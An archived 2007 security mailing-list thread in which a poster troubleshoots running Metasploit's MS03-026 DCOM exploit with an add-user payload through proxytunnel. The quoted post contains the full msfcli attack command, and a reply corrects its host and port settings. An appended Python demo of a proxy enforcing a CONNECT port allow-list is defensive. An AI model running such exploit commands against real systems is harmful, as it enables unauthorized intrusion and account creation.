Re: Running metasploit thru proxytunnel

From: Alexander Bondarenko (al.bondarenko@gmail.com)
Date: Wed Oct 10 2007 - 10:46:24 EDT


Hi,

Why do you use RHOST=localhost? It should be the proxy IP, and RPORT should be
the proxy port, not 235.

Regards,
Alex

On Saturday 06 October 2007 15:18, James Kelly wrote:
> Folks
>
> I've been banging my head into my keyboard for two days now, not
> getting anywhere, and I was hoping one of you could smack me upside
> the head and tell me what I've screwed up.
>
> Problem:
>
> attacker IP: 1.2.3.4
> proxy IP: 2.3.4.5
> proxy port 6666
> victim: 3.4.5.6
> victim port: 7777
>
> Proxytunnel setup:
>
> proxytunnel -a 666 -p 2.3.4.4:6666 -d 3.4.5.6:7777
> **now the above config works fine with rdesktop when I use:
>
> proxytunnel -a 666 -p 2.3.4.5:6666 -d 3.4.5.6:3389
> and I do
> rdesktop localhost:666 <--I can ts to the victim box just fine.
>
> When I try to do metasploit over proxytunnel I do
> config:
> Metasploit framework2
> exploit: msrpc_dcom_ms03_026 <--what I like to refer to as "Insecure
> Shell" ;-) goes to RPORT 135
> payload: win32_adduser
>
> first the tunnel:
> proxytunnel -a 235 -p 2.3.4.5:6666 -d 3.4.5.6:135
> now metasploit
> msfcli msrpc_dcom_ms03_026 PAYLOAD=win32_adduser RHOST=localhost
> RPORT=235 PASS=password USER=blah
>
> When I hit the exploit I see "Sending Request..." then nothing.
>
> I can rdesktop via proxytunnel to the victim successfully but cannot
> login with username blah password password.
>
> Assume the victim is vulnerable to dcom.
>
> Now, can anyone see anything obvious that I've screwed up?
>
>
> ____________________________________________________________________________
> 01001001 01100110 01111001 01101111 01110101 01100011 01100001 01101110
> 01110010 01100101 01100001 01100100 01110100 01101000 01101001 01110011
> 01111001 01101111 01110101 01101110 01100101 01100101 01100100 01110100
> 01101111 01100111 01100101 01110100 01100001 01101100 01101001 01100110
> 01100101 0010111
> ____________________________________________________________________________
>
>
> ------------------------------------------------------------------------
> This list is sponsored by: Cenzic
>
> Need to secure your web apps NOW?
> Cenzic finds more, "real" vulnerabilities fast.
> Click to try it, buy it or download a solution FREE today!
>
> http://www.cenzic.com/downloads
> ------------------------------------------------------------------------
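The tunnel in the quoted post relies on the HTTP CONNECT method: proxytunnel opens a TCP connection to the proxy, sends a CONNECT request naming the destination host and port, and only relays the client's bytes once the proxy answers with a 2xx status. Whether a given destination port is reachable through the tunnel is therefore a policy decision made by the proxy, and a proxy that permits CONNECT to 3389 but refuses 135 will leave the client hanging or erroring on the second tunnel. The following Python example is added here and is not code from the thread or from the proxytunnel or Metasploit projects. It runs a one-shot mock proxy on 127.0.0.1 that applies a constructed destination-port allow-list (443 only by default), records an audit line for each CONNECT, and answers the handshake; the client side sends the same CONNECT request line proxytunnel would. The destination address 203.0.113.10 and the allow-list are assumptions for the demo, and the mock only performs the policy check and status reply, not the byte relay a real proxy does afterwards.

```python
import socket
import threading

# Constructed policy for the demo: the mock proxy only grants CONNECT to these
# destination ports. Production proxies expose similar allow-lists, and limiting
# CONNECT to 443 is a common hardening step that also makes stray tunnels visible
# in the proxy's access log as 403s.
DEFAULT_ALLOWED_PORTS = frozenset({443})


def parse_connect_request(raw: bytes):
    """Parse the request line of an HTTP CONNECT request.

    Returns (host, port) or None when the line is not a well-formed CONNECT.
    """
    request_line = raw.split(b"\r\n", 1)[0].decode("ascii", "replace")
    parts = request_line.split()
    if len(parts) != 3 or parts[0] != "CONNECT" or not parts[2].startswith("HTTP/"):
        return None
    host, sep, port = parts[1].rpartition(":")
    if not sep or not host or not port.isdigit():
        return None
    return host, int(port)


def proxy_decision(raw: bytes, allowed_ports=DEFAULT_ALLOWED_PORTS):
    """Decide how the mock proxy answers a CONNECT request.

    Returns (status_code, response_bytes, target); target is None for a
    malformed request.
    """
    target = parse_connect_request(raw)
    if target is None:
        return 400, b"HTTP/1.0 400 Bad Request\r\n\r\n", None
    if target[1] not in allowed_ports:
        return 403, b"HTTP/1.0 403 Forbidden\r\n\r\n", target
    return 200, b"HTTP/1.0 200 Connection established\r\n\r\n", target


def _serve_one(listener, allowed_ports, audit_log):
    """Accept one client, answer its CONNECT, and record an audit line.

    This mock only performs the policy check and sends the status line; a real
    proxy would then relay bytes between the client and the target on a 200.
    """
    conn, peer = listener.accept()
    with conn:
        raw = conn.recv(4096)
        code, response, target = proxy_decision(raw, allowed_ports)
        audit_log.append(f"CONNECT from {peer[0]} to {target} -> {code}")
        conn.sendall(response)


def connect_through_proxy(proxy_addr, dest_host, dest_port, timeout=5.0):
    """Client side of the handshake: send CONNECT and return the status code."""
    with socket.create_connection(proxy_addr, timeout=timeout) as sock:
        request = f"CONNECT {dest_host}:{dest_port} HTTP/1.0\r\n\r\n"
        sock.sendall(request.encode("ascii"))
        status_line = sock.recv(4096).split(b"\r\n", 1)[0]
    return int(status_line.split()[1])


def run_demo(dest_port, allowed_ports=DEFAULT_ALLOWED_PORTS):
    """Start a one-shot mock proxy on 127.0.0.1 and run one CONNECT against it.

    Returns (status_code, audit_log) so the outcome can be inspected or asserted.
    """
    audit_log = []
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.settimeout(5.0)
    listener.bind(("127.0.0.1", 0))  # ephemeral port; nothing leaves the host
    listener.listen(1)
    worker = threading.Thread(target=_serve_one, args=(listener, allowed_ports, audit_log))
    worker.start()
    try:
        # 203.0.113.10 is a documentation address (TEST-NET-3), constructed for the demo.
        code = connect_through_proxy(listener.getsockname(), "203.0.113.10", dest_port)
    finally:
        worker.join(5.0)
        listener.close()
    return code, audit_log


if __name__ == "__main__":
    for port in (443, 135):
        code, log = run_demo(port)
        print(f"dest port {port}: status {code}; audit: {log}")
```

Running the block shows the two outcomes side by side: the CONNECT to 443 is granted, the CONNECT to 135 is refused with 403, and in both cases the proxy's audit log names the requesting client, the target and the decision. That log line is what a proxy administrator would look for when asked why a tunnel that works for one destination port fails for another.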




This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:09 EDT